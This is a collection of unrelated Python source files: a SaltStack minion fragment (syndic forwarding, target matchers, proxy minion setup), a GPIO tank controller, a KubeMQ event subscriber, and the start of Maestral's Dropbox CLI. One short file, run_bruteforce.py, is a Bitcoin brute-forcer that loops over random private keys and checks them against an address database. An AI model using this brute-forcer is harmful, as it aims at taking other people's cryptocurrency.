log.critical('Unable to call {0} on any masters!'.format(func))
def iter_master_options(self, master_id=None):
'''
Iterate (in order) over your options for master
'''
masters = list(self._syndics.keys())
shuffle(masters)
if master_id not in self._syndics:
master_id = masters.pop(0)
else:
masters.remove(master_id)
while True:
yield master_id, self._syndics[master_id]
if len(masters) == 0:
break
master_id = masters.pop(0)
def _reset_event_aggregation(self):
self.jids = {}
self.raw_events = []
# Syndic Tune In
def tune_in(self):
'''
Lock onto the publisher. This is the main event loop for the syndic
'''
self._spawn_syndics()
# Instantiate the local client
self.local = salt.client.get_local_client(self.opts['_minion_conf_file'])
self.local.event.subscribe('')
log.debug('MultiSyndic \'{0}\' trying to tune in'.format(self.opts['id']))
# register the event sub to the poller
self._reset_event_aggregation()
self.local_event_stream = zmq.eventloop.zmqstream.ZMQStream(self.local.event.sub, io_loop=self.io_loop)
self.local_event_stream.on_recv(self._process_event)
# forward events every syndic_event_forward_timeout
self.forward_events = tornado.ioloop.PeriodicCallback(self._forward_events,
self.opts['syndic_event_forward_timeout'] * 1000,
io_loop=self.io_loop)
self.forward_events.start()
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
self.io_loop.start()
def _process_event(self, raw):
# TODO: cleanup: Move down into event class
raw = raw[0]
mtag, data = self.local.event.unpack(raw, self.local.event.serial)
event = {'data': data, 'tag': mtag}
log.trace('Got event {0}'.format(event['tag'])) # pylint: disable=no-member
tag_parts = event['tag'].split('/')
if len(tag_parts) >= 4 and tag_parts[1] == 'job' and \
salt.utils.jid.is_jid(tag_parts[2]) and tag_parts[3] == 'ret' and \
'return' in event['data']:
if 'jid' not in event['data']:
# Not a job return
return
if self.syndic_mode == 'cluster' and event['data'].get('master_id', 0) == self.opts.get('master_id', 1):
log.debug('Return received with matching master_id, not forwarding')
return
jdict = self.jids.setdefault(event['tag'], {})
if not jdict:
jdict['__fun__'] = event['data'].get('fun')
jdict['__jid__'] = event['data']['jid']
jdict['__load__'] = {}
fstr = '{0}.get_load'.format(self.opts['master_job_cache'])
# Only need to forward each load once. Don't hit the disk
# for every minion return!
if event['data']['jid'] not in self.jid_forward_cache:
jdict['__load__'].update(
self.mminion.returners[fstr](event['data']['jid'])
)
self.jid_forward_cache.add(event['data']['jid'])
if len(self.jid_forward_cache) > self.opts['syndic_jid_forward_cache_hwm']:
# Pop the oldest jid from the cache
tmp = sorted(list(self.jid_forward_cache))
tmp.pop(0)
self.jid_forward_cache = set(tmp)
if 'master_id' in event['data']:
# __'s to make sure it doesn't print out on the master cli
jdict['__master_id__'] = event['data']['master_id']
jdict[event['data']['id']] = event['data']['return']
else:
# TODO: config to forward these? If so we'll have to keep track of who
# has seen them
            # if we are the top-level master -- don't forward all the minion events
if self.syndic_mode == 'sync':
# Add generic event aggregation here
if 'retcode' not in event['data']:
self.raw_events.append(event)
def _forward_events(self):
log.trace('Forwarding events') # pylint: disable=no-member
if self.raw_events:
self._call_syndic('_fire_master',
kwargs={'events': self.raw_events,
'pretag': tagify(self.opts['id'], base='syndic'),
'timeout': self.SYNDIC_EVENT_TIMEOUT,
},
)
for jid, jid_ret in self.jids.items():
self._call_syndic('_return_pub',
args=(jid_ret, '_syndic_return'),
kwargs={'timeout': self.SYNDIC_EVENT_TIMEOUT},
master_id=jid_ret.get('__master_id__'),
)
self._reset_event_aggregation()
class Matcher(object):
'''
    Used to check whether targeting expressions sent from the master match this minion
'''
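    # A hedged usage sketch; opts is assumed to carry 'id', 'grains' and
    # 'pillar', and the target strings are illustrative:
    #
    #   matcher = Matcher(opts)
    #   matcher.glob_match('web*')          # glob against opts['id']
    #   matcher.grain_match('os:Ubuntu')    # delimiter-separated grain glob
    #   matcher.list_match('web1,web2,db1')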
def __init__(self, opts, functions=None):
self.opts = opts
self.functions = functions
def confirm_top(self, match, data, nodegroups=None):
'''
Takes the data passed to a top file environment and determines if the
data matches this minion
'''
matcher = 'compound'
if not data:
log.error('Received bad data when setting the match from the top '
'file')
return False
for item in data:
if isinstance(item, dict):
if 'match' in item:
matcher = item['match']
if hasattr(self, matcher + '_match'):
funcname = '{0}_match'.format(matcher)
if matcher == 'nodegroup':
return getattr(self, funcname)(match, nodegroups)
return getattr(self, funcname)(match)
else:
log.error('Attempting to match with unknown matcher: {0}'.format(
matcher
))
return False
def glob_match(self, tgt):
'''
Returns true if the passed glob matches the id
'''
if not isinstance(tgt, six.string_types):
return False
return fnmatch.fnmatch(self.opts['id'], tgt)
def pcre_match(self, tgt):
'''
Returns true if the passed pcre regex matches
'''
return bool(re.match(tgt, self.opts['id']))
def list_match(self, tgt):
'''
Determines if this host is on the list
'''
if isinstance(tgt, six.string_types):
tgt = tgt.split(',')
return bool(self.opts['id'] in tgt)
def grain_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the grains glob match
'''
log.debug('grains target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for grains match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['grains'], tgt, delimiter=delimiter
)
def grain_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Matches a grain based on regex
'''
log.debug('grains pcre target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for grains pcre match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['grains'], tgt,
delimiter=delimiter, regex_match=True)
def data_match(self, tgt):
'''
Match based on the local data store on the minion
'''
if self.functions is None:
utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(self.opts, utils=utils)
comps = tgt.split(':')
if len(comps) < 2:
return False
val = self.functions['data.getval'](comps[0])
if val is None:
# The value is not defined
return False
if isinstance(val, list):
# We are matching a single component to a single list member
for member in val:
if fnmatch.fnmatch(str(member).lower(), comps[1].lower()):
return True
return False
if isinstance(val, dict):
if comps[1] in val:
return True
return False
return bool(fnmatch.fnmatch(
val,
comps[1],
))
def pillar_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the pillar glob match
'''
log.debug('pillar target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['pillar'], tgt, delimiter=delimiter
)
def pillar_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the pillar pcre match
'''
log.debug('pillar PCRE target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar PCRE match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['pillar'], tgt, delimiter=delimiter, regex_match=True
)
def pillar_exact_match(self, tgt, delimiter=':'):
'''
Reads in the pillar match, no globbing, no PCRE
'''
log.debug('pillar target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['pillar'],
tgt,
delimiter=delimiter,
exact_match=True)
def ipcidr_match(self, tgt):
'''
Matches based on IP address or CIDR notation
'''
try:
tgt = ipaddress.ip_network(tgt)
# Target is a network
proto = 'ipv{0}'.format(tgt.version)
if proto not in self.opts['grains']:
return False
else:
return salt.utils.network.in_subnet(tgt, self.opts['grains'][proto])
except: # pylint: disable=bare-except
try:
# Target should be an address
proto = 'ipv{0}'.format(ipaddress.ip_address(tgt).version)
if proto not in self.opts['grains']:
return False
else:
return tgt in self.opts['grains'][proto]
except: # pylint: disable=bare-except
                log.error('Invalid IP/CIDR target: {0}'.format(tgt))
return False
def range_match(self, tgt):
'''
Matches based on range cluster
'''
if HAS_RANGE:
range_ = seco.range.Range(self.opts['range_server'])
try:
return self.opts['grains']['fqdn'] in range_.expand(tgt)
except seco.range.RangeException as exc:
log.debug('Range exception in compound match: {0}'.format(exc))
return False
return False
def compound_match(self, tgt):
'''
Runs the compound target check
'''
if not isinstance(tgt, six.string_types) and not isinstance(tgt, (list, tuple)):
log.error('Compound target received that is neither string, list nor tuple')
return False
log.debug('compound_match: {0} ? {1}'.format(self.opts['id'], tgt))
ref = {'G': 'grain',
'P': 'grain_pcre',
'I': 'pillar',
'J': 'pillar_pcre',
'L': 'list',
'N': None, # Nodegroups should already be expanded
'S': 'ipcidr',
'E': 'pcre'}
if HAS_RANGE:
ref['R'] = 'range'
results = []
opers = ['and', 'or', 'not', '(', ')']
if isinstance(tgt, six.string_types):
words = tgt.split()
else:
words = tgt
for word in words:
target_info = salt.utils.minions.parse_target(word)
# Easy check first
if word in opers:
if results:
if results[-1] == '(' and word in ('and', 'or'):
log.error('Invalid beginning operator after "(": {0}'.format(word))
return False
if word == 'not':
                        if results[-1] not in ('and', 'or', '('):
results.append('and')
results.append(word)
else:
# seq start with binary oper, fail
if word not in ['(', 'not']:
log.error('Invalid beginning operator: {0}'.format(word))
return False
results.append(word)
elif target_info and target_info['engine']:
if 'N' == target_info['engine']:
# Nodegroups should already be expanded/resolved to other engines
log.error('Detected nodegroup expansion failure of "{0}"'.format(word))
return False
engine = ref.get(target_info['engine'])
if not engine:
# If an unknown engine is called at any time, fail out
log.error('Unrecognized target engine "{0}" for'
' target expression "{1}"'.format(
target_info['engine'],
word,
)
)
return False
engine_args = [target_info['pattern']]
engine_kwargs = {}
if target_info['delimiter']:
engine_kwargs['delimiter'] = target_info['delimiter']
results.append(
str(getattr(self, '{0}_match'.format(engine))(*engine_args, **engine_kwargs))
)
else:
# The match is not explicitly defined, evaluate it as a glob
results.append(str(self.glob_match(word)))
results = ' '.join(results)
log.debug('compound_match {0} ? "{1}" => "{2}"'.format(self.opts['id'], tgt, results))
try:
return eval(results) # pylint: disable=W0123
except Exception:
log.error('Invalid compound target: {0} for results: {1}'.format(tgt, results))
return False
return False
def nodegroup_match(self, tgt, nodegroups):
'''
This is a compatibility matcher and is NOT called when using
nodegroups for remote execution, but is called when the nodegroups
matcher is used in states
'''
if tgt in nodegroups:
return self.compound_match(
salt.utils.minions.nodegroup_comp(tgt, nodegroups)
)
return False
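# --------------------------------------------------------------------------
# Illustrative sketch (not part of Salt): how the matchers above behave for a
# minion whose id is 'web1'. The minimal opts dict is an assumption; a real
# minion passes its full configuration, including grains and pillar data.
def _matcher_example():
    opts = {'id': 'web1', 'grains': {}, 'pillar': {}}
    matcher = Matcher(opts)
    matched_glob = matcher.glob_match('web*')       # True: glob against the minion id
    matched_list = matcher.list_match('web1,web2')  # True: the id is in the list
    # Compound targets such as 'L@web1,web2 and not E@db.*' combine the single
    # matchers above with and/or/not and are evaluated by compound_match.
    return matched_glob, matched_list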
class ProxyMinion(Minion):
'''
This class instantiates a 'proxy' minion--a minion that does not manipulate
the host it runs on, but instead manipulates a device that cannot run a minion.
'''
# TODO: better name...
@tornado.gen.coroutine
def _post_master_init(self, master):
'''
Function to finish init after connecting to a master
This is primarily loading modules, pillars, etc. (since they need
to know which master they connected to)
'''
log.debug("subclassed _post_master_init")
self.opts['master'] = master
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
if 'proxy' not in self.opts['pillar']:
log.error('No proxy key found in pillar for id '+self.opts['id']+'.')
log.error('Check your pillar configuration and contents. Salt-proxy aborted.')
self._running = False
raise SaltSystemExit(code=-1)
fq_proxyname = self.opts['pillar']['proxy']['proxytype']
self.opts['proxy'] = self.opts['pillar']['proxy']
# We need to do this again, because we are going to throw out a lot of grains.
self.opts['grains'] = salt.loader.grains(self.opts)
# Need to load the modules so they get all the dunder variables
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
# we can then sync any proxymodules down from the master
self.functions['saltutil.sync_proxymodules'](saltenv='base')
# Then load the proxy module
self.proxy = salt.loader.proxy(self.opts)
# And re-load the modules so the __proxy__ variable gets injected
self.functions, self.returners, self.function_errors, self.executors = self._load_modules(proxy=self.proxy)
self.functions.pack['__proxy__'] = self.proxy
self.proxy.pack['__salt__'] = self.functions
self.proxy.pack['__ret__'] = self.returners
if ('{0}.init'.format(fq_proxyname) not in self.proxy
or '{0}.shutdown'.format(fq_proxyname) not in self.proxy):
log.error('Proxymodule {0} is missing an init() or a shutdown() or both.'.format(fq_proxyname))
log.error('Check your proxymodule. Salt-proxy aborted.')
self._running = False
raise SaltSystemExit(code=-1)
proxy_init_fn = self.proxy[fq_proxyname+'.init']
proxy_init_fn(self.opts)
self.opts['grains'] = salt.loader.grains(self.opts)
# Check config 'add_proxymodule_to_opts' Remove this in Boron.
if self.opts['add_proxymodule_to_opts']:
self.opts['proxymodule'] = self.proxy
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matcher = Matcher(self.opts, self.functions)
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
uid = salt.utils.get_uid(user=self.opts.get('user', None))
self.proc_dir = get_proc_dir(self.opts['cachedir'], uid=uid)
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners)
# add default scheduling jobs to the minions scheduler
if self.opts['mine_enabled'] and 'mine.update' in self.functions:
self.schedule.add_job({
'__mine_interval':
{
'function': 'mine.update',
'minutes': self.opts['mine_interval'],
'jid_include': True,
'maxrunning': 2,
'return_job': self.opts.get('mine_return_job', False)
}
}, persist=True)
log.info('Added mine.update to scheduler')
else:
self.schedule.delete_job('__mine_interval', persist=True)
# add master_alive job if enabled
if self.opts['master_alive_interval'] > 0:
self.schedule.add_job({
'__master_alive':
{
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
}, persist=True)
self.grains_cache = self.opts['grains']
|
run_bruteforce.py
|
# Plutus Bitcoin Brute Forcer
# Made by Isaac Delly
# https://github.com/Isaacdelly/Plutus
import multiprocessing
import bitcoinlib
import plutus
import oldKeyGen
import newKeyGen
def main(database):
print('Working...')
while True:
# Improved
key = newKeyGen.keygen_random()
plutus.process(key[0], key[2], key[3], database)
plutus.process(key[0], key[2], key[4], database)
# Original
# private_key = oldKeyGen.generate_private_key()
# public_key = oldKeyGen.private_key_to_public_key(private_key)
# address = oldKeyGen.public_key_to_address(public_key)
# plutus.process(private_key, public_key, address, database)
if __name__ == '__main__':
database = plutus.read_database()
# for cpu in range(multiprocessing.cpu_count()):
# for cpu in range(1):
# multiprocessing.Process(target=main, args=(database, )).start()
main(database)
|
control_tank.py
|
import logging
import os
import subprocess
import threading
import time
logger = logging.getLogger(__name__)
class ControlTank:
    """Tank-style drive: two motors (A and B) driven through sysfs GPIO pins 12-15, with optional software PWM."""
PWM_DUTY_A: float = 0.9
PWM_DUTY_B: float = 0.9
def __init__(self) -> None:
self._enable_a: bool = False
self._enable_b: bool = False
self._pwm_thread_a = threading.Thread(target=self._pwm_a_loop)
self._pwm_thread_b = threading.Thread(target=self._pwm_b_loop)
def initialize(self) -> bool:
ret = self._setup_gpio()
if ret is False:
return False
ret = self.stop()
if ret is False:
return False
# self._start_pwm_threads()
return True
def _setup_gpio(self) -> bool:
# Map GPIO12, GPIO13, GPIO14, GPIO15 (pin 37, 22, 13, 18)
with open("/sys/class/gpio/export", "w") as dev_file:
if os.path.exists("/sys/class/gpio/gpio12") is False:
ret = subprocess.run(["echo", "12"], stdout=dev_file)
if ret.returncode != 0:
return False
if os.path.exists("/sys/class/gpio/gpio13") is False:
ret = subprocess.run(["echo", "13"], stdout=dev_file)
if ret.returncode != 0:
return False
if os.path.exists("/sys/class/gpio/gpio14") is False:
ret = subprocess.run(["echo", "14"], stdout=dev_file)
if ret.returncode != 0:
return False
if os.path.exists("/sys/class/gpio/gpio15") is False:
ret = subprocess.run(["echo", "15"], stdout=dev_file)
if ret.returncode != 0:
return False
# Wait for mapping GPIO
time.sleep(3)
# Set direction as out on GPIO12 (pin 37)
with open("/sys/class/gpio/gpio12/direction", "w") as dev_file:
ret = subprocess.run(["echo", "out"], stdout=dev_file)
if ret.returncode != 0:
return False
# Set direction as out on GPIO13 (pin 22)
with open("/sys/class/gpio/gpio13/direction", "w") as dev_file:
ret = subprocess.run(["echo", "out"], stdout=dev_file)
if ret.returncode != 0:
return False
# Set direction as out on GPIO14 (pin 13)
with open("/sys/class/gpio/gpio14/direction", "w") as dev_file:
ret = subprocess.run(["echo", "out"], stdout=dev_file)
if ret.returncode != 0:
return False
# Set direction as out on GPIO15 (pin 18)
with open("/sys/class/gpio/gpio15/direction", "w") as dev_file:
ret = subprocess.run(["echo", "out"], stdout=dev_file)
if ret.returncode != 0:
return False
return True
def _set_gpio(self, addr: int, value: int) -> bool:
with open(f"/sys/class/gpio/gpio{addr}/value", "w") as dev_file:
ret = subprocess.run(["echo", f"{value}"], stdout=dev_file)
if ret.returncode != 0:
return False
return True
def move_forward(self) -> bool:
ret = self._set_gpio(12, 0)
if ret is False:
return False
ret = self._set_gpio(13, 1)
if ret is False:
return False
ret = self._set_gpio(14, 0)
if ret is False:
return False
ret = self._set_gpio(15, 1)
if ret is False:
return False
return True
def move_backward(self) -> bool:
ret = self._set_gpio(12, 1)
if ret is False:
return False
ret = self._set_gpio(13, 0)
if ret is False:
return False
ret = self._set_gpio(14, 1)
if ret is False:
return False
ret = self._set_gpio(15, 0)
if ret is False:
return False
return True
def turn_clockwise(self) -> bool:
ret = self._set_gpio(12, 1)
if ret is False:
return False
ret = self._set_gpio(13, 0)
if ret is False:
return False
ret = self._set_gpio(14, 0)
if ret is False:
return False
ret = self._set_gpio(15, 1)
if ret is False:
return False
return True
def turn_counterclockwise(self) -> bool:
ret = self._set_gpio(12, 0)
if ret is False:
return False
ret = self._set_gpio(13, 1)
if ret is False:
return False
ret = self._set_gpio(14, 1)
if ret is False:
return False
ret = self._set_gpio(15, 0)
if ret is False:
return False
return True
def stop(self) -> bool:
ret = self._set_gpio(12, 1)
if ret is False:
return False
ret = self._set_gpio(13, 1)
if ret is False:
return False
ret = self._set_gpio(14, 1)
if ret is False:
return False
ret = self._set_gpio(15, 1)
if ret is False:
return False
return True
def _start_pwm_threads(self) -> None:
self._pwm_thread_a.start()
self._pwm_thread_b.start()
    def _pwm_a_loop(self) -> None:
        # Software PWM on GPIO13: ~10 Hz period with a PWM_DUTY_A duty cycle.
        while True:
            if self._enable_a is True:
                self._set_gpio(13, 1)
                time.sleep(ControlTank.PWM_DUTY_A / 10)
                self._set_gpio(13, 0)
                time.sleep(0.1 - ControlTank.PWM_DUTY_A / 10)
            else:
                self._set_gpio(13, 0)
                time.sleep(0.1)  # avoid busy-waiting while motor A is disabled
    def _pwm_b_loop(self) -> None:
        # Software PWM on GPIO15: ~10 Hz period with a PWM_DUTY_B duty cycle.
        while True:
            if self._enable_b is True:
                self._set_gpio(15, 1)
                time.sleep(ControlTank.PWM_DUTY_B / 10)
                self._set_gpio(15, 0)
                time.sleep(0.1 - ControlTank.PWM_DUTY_B / 10)
            else:
                self._set_gpio(15, 0)
                time.sleep(0.1)  # avoid busy-waiting while motor B is disabled
    def _set_motor_direction_a(self, value: int) -> bool:
        return self._set_gpio(12, value)
    def _set_motor_direction_b(self, value: int) -> bool:
        return self._set_gpio(14, value)
def move_forward_pwm(self) -> None:
        ret = self._set_motor_direction_a(0)
if ret is False:
logger.error("failed to move_forward")
return
        ret = self._set_motor_direction_b(0)
if ret is False:
logger.error("failed to move_forward")
return
self._enable_a = True
self._enable_b = True
def move_backward_pwm(self) -> None:
        ret = self._set_motor_direction_a(1)
if ret is False:
logger.error("failed to move_backward")
return
        ret = self._set_motor_direction_b(1)
if ret is False:
logger.error("failed to move_backward")
return
self._enable_a = True
self._enable_b = True
def turn_clockwise_pwm(self) -> None:
        ret = self._set_motor_direction_a(1)
if ret is False:
logger.error("failed to turn_clockwise")
return
        ret = self._set_motor_direction_b(0)
if ret is False:
logger.error("failed to turn_clockwise")
return
self._enable_a = True
self._enable_b = True
def turn_counterclockwise_pwm(self) -> None:
        ret = self._set_motor_direction_a(0)
if ret is False:
logger.error("failed to turn_counterclockwise")
return
        ret = self._set_motor_direction_b(1)
if ret is False:
logger.error("failed to turn_counterclockwise")
return
self._enable_a = True
self._enable_b = True
def stop_pwm(self) -> None:
self._enable_a = False
self._enable_b = False
def finalize_pwm(self) -> None:
self._pwm_thread_a.join()
self._pwm_thread_b.join()
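# --------------------------------------------------------------------------
# Illustrative sketch (assumption, not part of ControlTank): the same sysfs
# GPIO protocol used above can also be driven with plain file writes instead
# of spawning `echo` through subprocess. Pin numbers match the ones used by
# the class (GPIO12-15).
def sysfs_write(path: str, value: str) -> None:
    # Writing under /sys/class/gpio requires root or a matching udev rule.
    with open(path, "w") as dev_file:
        dev_file.write(value)
def export_output_pin(gpio: int) -> None:
    # Export the pin if it is not mapped yet, then configure it as an output.
    if not os.path.exists(f"/sys/class/gpio/gpio{gpio}"):
        sysfs_write("/sys/class/gpio/export", str(gpio))
    sysfs_write(f"/sys/class/gpio/gpio{gpio}/direction", "out")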
|
subscriber.py
|
import logging
import threading
import time
import grpc
from kubemq.grpc import Empty
from kubemq.basic.grpc_client import GrpcClient
from kubemq.events.event_receive import EventReceive
from kubemq.subscription import SubscribeType, EventsStoreType
from kubemq.tools.listener_cancellation_token import ListenerCancellationToken
logger = logging.getLogger(__name__)
class Subscriber(GrpcClient):
def __init__(self, kubemq_address=None, encryptionHeader=None):
"""
        Initialize a new Subscriber under the requested KubeMQ server address.
        :param str kubemq_address: KubeMQ server address. If None, it will be read from the config or an environment variable.
        :param byte[] encryptionHeader: the encryption header used for KubeMQ authentication.
"""
GrpcClient.__init__(self, encryptionHeader)
if kubemq_address:
self._kubemq_address = kubemq_address
def ping(self):
"""ping check connection to the kubemq"""
ping_result = self.get_kubemq_client().Ping(Empty())
logger.debug("event subscriber KubeMQ address:%s ping result:%s'" % (self._kubemq_address, ping_result))
return ping_result
def subscribe_to_events(self, subscribe_request, handler, error_handler,
listener_cancellation_token=ListenerCancellationToken()):
"""
        Register a handler to a KubeMQ channel.
        :param SubscribeRequest subscribe_request: request that determines the subscription configuration.
        :param handler: callback invoked when an EventReceive arrives.
        :param error_handler: callback invoked when an error is received from KubeMQ.
        :param listener_cancellation_token: cancellation token; once cancel is called, the subscription to KubeMQ is cancelled.
        :return: A thread running the Subscribe Request.
"""
if not subscribe_request.channel:
raise ValueError("channel parameter is mandatory.")
if not subscribe_request.is_valid_type("Events"):
raise ValueError("Invalid Subscribe Type for this Class.")
if subscribe_request.subscribe_type == SubscribeType.EventsStore:
if not subscribe_request.client_id:
raise ValueError("client_id parameter is mandatory.")
if subscribe_request.events_store_type == EventsStoreType.Undefined:
raise ValueError("events_store_type parameter is mandatory.")
inner_subscribe_request = subscribe_request.to_inner_subscribe_request()
call = self.get_kubemq_client().SubscribeToEvents(inner_subscribe_request, metadata=self._metadata)
def subscribe_to_event(listener_cancellation_token):
try:
while True:
event_receive = call.next()
logger.info("Subscriber Received Event: EventID:'%s', Channel:'%s', Body:'%s Tags:%s'" % (
event_receive.EventID,
event_receive.Channel,
event_receive.Body,
event_receive.Tags
))
handler(EventReceive(event_receive))
except grpc.RpcError as error:
if (listener_cancellation_token.is_cancelled):
logger.info("Sub closed by listener request")
error_handler(str(error))
else:
logger.exception("Subscriber Received Error: Error:'%s'" % (error))
error_handler(str(error))
except Exception as e:
logger.exception("Subscriber Received Error: Error:'%s'" % (e))
error_handler(str(e))
        def check_sub_to_valid(listener_cancellation_token):
            # Poll the cancellation token and cancel the gRPC call when requested.
            while True:
                if listener_cancellation_token.is_cancelled:
                    logger.info("Sub closed by listener request")
                    call.cancel()
                    return
                time.sleep(0.1)
thread = threading.Thread(target=subscribe_to_event, args=(listener_cancellation_token,))
thread.daemon = True
thread.start()
listener_thread = threading.Thread(target=check_sub_to_valid, args=(listener_cancellation_token,))
listener_thread.daemon = True
listener_thread.start()
return thread
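# --------------------------------------------------------------------------
# Illustrative usage sketch (assumption, not part of the SDK): wiring a handler
# and an error handler into subscribe_to_events. The subscribe_request is
# assumed to be built elsewhere with the channel and client settings that the
# validation at the top of subscribe_to_events requires.
def run_subscription(subscriber, subscribe_request):
    token = ListenerCancellationToken()
    def handler(event_receive):
        # event_receive is the EventReceive wrapper created above.
        logger.info("handled event: %r" % (event_receive,))
    def error_handler(message):
        logger.error("subscription error: %s" % (message,))
    thread = subscriber.subscribe_to_events(
        subscribe_request, handler, error_handler, token)
    return thread, token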
|
cli.py
|
# -*- coding: utf-8 -*-
"""
This module defines the functions to configure and interact with Maestral from the
command line. Some imports are deferred to the functions that require them in order to
reduce the startup time of individual CLI commands.
"""
# system imports
import sys
import os
import os.path as osp
import functools
import time
from typing import Optional, Dict, List, Tuple, Callable, Union, cast, TYPE_CHECKING
# external imports
import click
# local imports
from . import __version__
from .utils import cli
if TYPE_CHECKING:
from click.shell_completion import CompletionItem
from datetime import datetime
from .main import Maestral
from .daemon import MaestralProxy
# ======================================================================================
# CLI dialogs and helper functions
# ======================================================================================
OK = click.style("[OK]", fg="green")
FAILED = click.style("[FAILED]", fg="red")
KILLED = click.style("[KILLED]", fg="red")
def stop_daemon_with_cli_feedback(config_name: str) -> None:
"""Wrapper around :meth:`daemon.stop_maestral_daemon_process`
with command line feedback."""
from .daemon import stop_maestral_daemon_process, Stop
click.echo("Stopping Maestral...", nl=False)
res = stop_maestral_daemon_process(config_name)
if res == Stop.Ok:
click.echo("\rStopping Maestral... " + OK)
elif res == Stop.NotRunning:
click.echo("\rMaestral daemon is not running.")
elif res == Stop.Killed:
click.echo("\rStopping Maestral... " + KILLED)
elif res == Stop.Failed:
click.echo("\rStopping Maestral... " + FAILED)
def select_dbx_path_dialog(
config_name: str, default_dir_name: Optional[str] = None, allow_merge: bool = False
) -> str:
"""
A CLI dialog to ask for a local Dropbox folder location.
:param config_name: The configuration to use for the default folder name.
:param default_dir_name: The default directory name. Defaults to
"Dropbox ({config_name})" if not given.
:param allow_merge: If ``True``, allows the selection of an existing folder without
deleting it. Defaults to ``False``.
:returns: Path given by user.
"""
from .utils.path import delete
default_dir_name = default_dir_name or f"Dropbox ({config_name.capitalize()})"
while True:
res = cli.select_path(
"Please choose a local Dropbox folder:",
default=f"~/{default_dir_name}",
files_allowed=False,
)
res = res.rstrip(osp.sep)
dropbox_path = osp.expanduser(res)
if osp.exists(dropbox_path):
if allow_merge:
text = (
"Directory already exists. Do you want to replace it "
"or merge its content with your Dropbox?"
)
choice = cli.select(text, options=["replace", "merge", "cancel"])
else:
text = (
"Directory already exists. Do you want to replace it? "
"Its content will be lost!"
)
replace = cli.confirm(text)
choice = 0 if replace else 2
if choice == 0:
err = delete(dropbox_path)
if err:
cli.warn(
"Could not write to selected location. "
"Please make sure that you have sufficient permissions."
)
else:
cli.ok("Replaced existing folder")
return dropbox_path
elif choice == 1:
cli.ok("Merging with existing folder")
return dropbox_path
else:
return dropbox_path
def link_dialog(m: Union["MaestralProxy", "Maestral"]) -> None:
"""
A CLI dialog for linking a Dropbox account.
:param m: Proxy to Maestral daemon.
"""
authorize_url = m.get_auth_url()
cli.info(f"Linking new account for '{m.config_name}' config")
cli.info("Retrieving auth code from Dropbox")
choice = cli.select(
"How would you like to you link your account?",
options=["Open Dropbox website", "Print auth URL to console"],
)
if choice == 0:
click.launch(authorize_url)
else:
cli.info("Open the URL below to retrieve an auth code:")
cli.info(authorize_url)
res = -1
while res != 0:
auth_code = cli.prompt("Enter the auth code:")
auth_code = auth_code.strip()
res = m.link(auth_code)
if res == 0:
email = m.get_state("account", "email")
cli.ok(f"Linked to {email}")
elif res == 1:
cli.warn("Invalid token, please try again")
elif res == 2:
cli.warn("Could not connect to Dropbox, please try again")
def check_for_updates() -> None:
"""
Checks if updates are available by reading the cached release number from the
config file and notifies the user. Prints an update note to the command line.
"""
from packaging.version import Version
from .config import MaestralConfig, MaestralState
conf = MaestralConfig("maestral")
state = MaestralState("maestral")
interval = conf.get("app", "update_notification_interval")
last_update_check = state.get("app", "update_notification_last")
latest_release = state.get("app", "latest_release")
if interval == 0 or time.time() - last_update_check < interval:
return
has_update = Version(__version__) < Version(latest_release)
if has_update:
cli.echo(
f"Update available v{__version__} → v{latest_release}. "
f"Please use your package manager to update."
)
def check_for_fatal_errors(m: Union["MaestralProxy", "Maestral"]) -> bool:
"""
Checks the given Maestral instance for fatal errors such as revoked Dropbox access,
deleted Dropbox folder etc. Prints a nice representation to the command line.
:param m: Proxy to Maestral daemon or Maestral instance.
:returns: True in case of fatal errors, False otherwise.
"""
import textwrap
maestral_err_list = m.fatal_errors
if len(maestral_err_list) > 0:
width = cli.get_term_width()
err = maestral_err_list[0]
err_title = cast(str, err["title"])
err_msg = cast(str, err["message"])
wrapped_msg = textwrap.fill(err_msg, width=width)
click.echo("")
click.secho(err_title, fg="red")
click.secho(wrapped_msg, fg="red")
click.echo("")
return True
else:
return False
def convert_api_errors(func: Callable) -> Callable:
"""
Decorator that catches a MaestralApiError and prints a formatted error message to
stdout before exiting. Calls ``sys.exit(1)`` after printing the error to stdout.
"""
from .errors import MaestralApiError
@functools.wraps(func)
def wrapper(*args, **kwargs):
try:
return func(*args, **kwargs)
except MaestralApiError as exc:
cli.warn(f"{exc.title}. {exc.message}")
sys.exit(1)
return wrapper
def _datetime_from_iso_str(time_str: str) -> "datetime":
"""
Converts an ISO 8601 time string such as '2015-05-15T15:50:38Z' to a timezone aware
datetime object in the local time zone.
"""
from datetime import datetime
# replace Z with +0000, required for Python 3.6 compatibility
time_str = time_str.replace("Z", "+0000")
return datetime.strptime(time_str, "%Y-%m-%dT%H:%M:%S%z").astimezone()
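# A minimal illustration (not used by the CLI) of the conversion above: the
# trailing 'Z' is replaced so the string parses as UTC, and the result is a
# timezone-aware datetime converted to the local zone.
def _example_iso_conversion() -> None:
    dt = _datetime_from_iso_str("2015-05-15T15:50:38Z")
    assert dt.tzinfo is not None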
# ======================================================================================
# Custom parameter types
# ======================================================================================
